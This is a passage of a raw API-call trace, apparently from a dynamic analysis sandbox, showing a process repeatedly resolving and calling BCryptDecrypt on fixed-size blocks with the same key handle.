cbIV=0x0, pbOutput=0x203053d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203053d, pcbResult=0x14f8fc) returned 0x0 [0170.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.484] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030632, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030632, pcbResult=0x14f8fc) returned 0x0 [0170.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.485] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030727, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030727, pcbResult=0x14f8fc) returned 0x0 [0170.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.779] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203081c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203081c, pcbResult=0x14f8fc) returned 0x0 [0170.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.781] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030911, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030911, pcbResult=0x14f8fc) returned 0x0 [0170.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.783] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030a06, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030a06, pcbResult=0x14f8fc) returned 0x0 [0170.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.785] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030afb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030afb, pcbResult=0x14f8fc) returned 0x0 [0170.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.788] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030bf0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030bf0, pcbResult=0x14f8fc) returned 0x0 [0170.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.790] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030ce5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030ce5, pcbResult=0x14f8fc) returned 0x0 [0170.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.792] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030dda, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030dda, pcbResult=0x14f8fc) returned 0x0 [0170.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.794] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6bfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030ecf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030ecf, pcbResult=0x14f8fc) returned 0x0 [0170.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.796] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030fc4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030fc4, pcbResult=0x14f8fc) returned 0x0 [0170.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.798] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20310b9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20310b9, pcbResult=0x14f8fc) returned 0x0 [0170.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.799] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20311ae, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20311ae, pcbResult=0x14f8fc) returned 0x0 [0170.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.801] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20312a3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20312a3, pcbResult=0x14f8fc) returned 0x0 [0170.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.803] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031398, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031398, pcbResult=0x14f8fc) returned 0x0 [0170.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.807] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203148d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203148d, pcbResult=0x14f8fc) returned 0x0 [0170.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.810] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031582, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031582, pcbResult=0x14f8fc) returned 0x0 [0170.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.812] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031677, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031677, pcbResult=0x14f8fc) returned 0x0 [0171.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.025] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203176c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203176c, pcbResult=0x14f8fc) returned 0x0 [0171.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.028] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6c9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031861, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031861, pcbResult=0x14f8fc) returned 0x0 [0171.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.030] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6cad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031956, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031956, pcbResult=0x14f8fc) returned 0x0 [0171.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.031] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6cbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031a4b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031a4b, pcbResult=0x14f8fc) returned 0x0 [0171.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.033] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ccd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031b40, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031b40, pcbResult=0x14f8fc) returned 0x0 [0171.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.035] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6cdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031c35, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031c35, pcbResult=0x14f8fc) returned 0x0 [0171.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.036] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ced0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031d2a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031d2a, pcbResult=0x14f8fc) returned 0x0 [0171.038] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.038] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6cfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031e1f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031e1f, pcbResult=0x14f8fc) returned 0x0 [0171.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.039] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2031f14, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2031f14, pcbResult=0x14f8fc) returned 0x0 [0171.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.041] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032009, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032009, pcbResult=0x14f8fc) returned 0x0 [0171.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.042] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20320fe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20320fe, pcbResult=0x14f8fc) returned 0x0 [0171.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.044] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20321f3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20321f3, pcbResult=0x14f8fc) returned 0x0 [0171.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.046] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20322e8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20322e8, pcbResult=0x14f8fc) returned 0x0 [0171.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.048] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20323dd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20323dd, pcbResult=0x14f8fc) returned 0x0 [0171.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.049] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20324d2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20324d2, pcbResult=0x14f8fc) returned 0x0 [0171.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.051] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20325c7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20325c7, pcbResult=0x14f8fc) returned 0x0 [0171.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.052] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20326bc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20326bc, pcbResult=0x14f8fc) returned 0x0 [0171.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.054] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6d9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20327b1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20327b1, pcbResult=0x14f8fc) returned 0x0 [0171.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.055] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6dad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20328a6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20328a6, pcbResult=0x14f8fc) returned 0x0 [0171.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.057] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6dbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203299b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203299b, pcbResult=0x14f8fc) returned 0x0 [0171.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.059] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6dcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032a90, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032a90, pcbResult=0x14f8fc) returned 0x0 [0171.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.060] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ddd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032b85, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032b85, pcbResult=0x14f8fc) returned 0x0 [0171.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.221] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ded0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032c7a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032c7a, pcbResult=0x14f8fc) returned 0x0 [0171.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.223] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6dfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032d6f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032d6f, pcbResult=0x14f8fc) returned 0x0 [0171.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.224] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032e64, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032e64, pcbResult=0x14f8fc) returned 0x0 [0171.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.226] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2032f59, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2032f59, pcbResult=0x14f8fc) returned 0x0 [0171.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.227] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203304e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203304e, pcbResult=0x14f8fc) returned 0x0 [0171.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.228] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033143, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033143, pcbResult=0x14f8fc) returned 0x0 [0171.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.230] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033238, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033238, pcbResult=0x14f8fc) returned 0x0 [0171.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.231] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203332d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203332d, pcbResult=0x14f8fc) returned 0x0 [0171.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.233] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033422, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033422, pcbResult=0x14f8fc) returned 0x0 [0171.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.235] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033517, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033517, pcbResult=0x14f8fc) returned 0x0 [0171.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.237] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203360c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203360c, pcbResult=0x14f8fc) returned 0x0 [0171.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.240] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6e9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033701, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033701, pcbResult=0x14f8fc) returned 0x0 [0171.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.242] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ead0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20337f6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20337f6, pcbResult=0x14f8fc) returned 0x0 [0171.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.244] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ebd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20338eb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20338eb, pcbResult=0x14f8fc) returned 0x0 [0171.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.249] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6ecd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20339e0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20339e0, pcbResult=0x14f8fc) returned 0x0 [0171.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.252] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6edd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033ad5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033ad5, pcbResult=0x14f8fc) returned 0x0 [0171.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.255] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6eed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033bca, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033bca, pcbResult=0x14f8fc) returned 0x0 [0171.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.413] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6efd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033cbf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2033cbf, pcbResult=0x14f8fc) returned 0x0 [0171.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0171.414] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6f0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2033db4, cbOutput=0xf5, 